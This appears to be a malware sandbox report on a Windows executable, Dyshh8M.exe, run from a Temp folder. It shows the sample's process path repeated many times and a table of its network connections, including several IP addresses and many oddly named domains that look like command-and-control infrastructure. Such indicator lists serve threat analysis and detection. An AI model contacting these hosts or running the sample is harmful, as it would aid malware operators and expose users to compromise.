C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| US | 8.8.8.8:53 | embarkiffe.shop | udp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | calmingtefxtures.run | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 172.67.158.171:443 | calmingtefxtures.run | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 104.21.96.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 104.21.74.230:443 | tracnquilforest.life | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| NL | 172.217.23.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 172.217.168.234:443 | ogads-pa.googleapis.com | tcp |
| NL | 172.217.168.206:443 | apis.google.com | tcp |
| NL | 172.217.168.234:443 | ogads-pa.googleapis.com | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| NL | 142.251.39.110:443 | play.google.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.80.1:443 | exarthynature.run | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
